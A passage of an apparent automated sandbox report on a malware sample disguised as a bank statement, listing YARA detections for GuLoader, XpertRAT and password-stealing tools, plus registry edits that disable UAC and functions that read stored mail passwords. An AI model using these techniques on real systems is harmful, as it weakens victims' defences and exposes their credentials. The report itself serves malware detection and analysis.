Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmp Binary or memory string: 100|0h 0m 0s|1076|Program Manager|12
Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp Binary or memory string: Program ManagerCopyHere
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: Program Manager10 y 4*w
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: 0|Test - Xpert|United Kingdom|user - 405464|2.10.0|GB|0h 0m 0s|3.0.10|1|-4|0|Program Manager|X|||x-<O#
Source: iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmp Binary or memory string: 100|0h 0m 0s|1076|Program Manager|12?
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_0041691B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 17_2_0041691B
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00406B06 GetVersionExA, 14_2_00406B06
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 14_2_00407C79

Lowering of HIPS / PFW / Operating System Security Settings:

Disables user account control notifications
Source: C:\Users\user\Desktop\Statement from QNB.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Users\user\Desktop\Statement from QNB.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center UACDisableNotify
Disables UAC (registry)
Source: C:\Users\user\Desktop\Statement from QNB.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Stealing of Sensitive Information:

Yara detected Generic Dropper
Source: Yara match File source: 12.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80975835945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80977316956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80978780847.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
Yara detected MailPassView
Source: Yara match File source: 16.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000003.81136331884.0000000005E20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.81127160331.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.81129202432.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81205248968.0000000005DE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81103105159.0000000005DD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81120321422.0000000003091000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81102180166.0000000005DA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.81130233674.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.81127982382.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81119221282.0000000005DA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81119604744.0000000005DE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 3544, type: MEMORYSTR
Yara detected XpertRAT
Source: Yara match File source: 12.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80975835945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80977316956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80978780847.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 16_2_00402D9A
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 16_2_00402D9A
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: ESMTPPassword 16_2_004033D7
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: 12.3.iexplore.exe.5f1a8d8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.iexplore.exe.5f1a8d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.iexplore.exe.5f1a8d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.iexplore.exe.5f1a8d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.81143708925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.81144880094.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 2448, type: MEMORYSTR

Remote Access Functionality:

Yara detected XpertRAT
Source: Yara match File source: 12.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80975835945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80977316956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80978780847.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR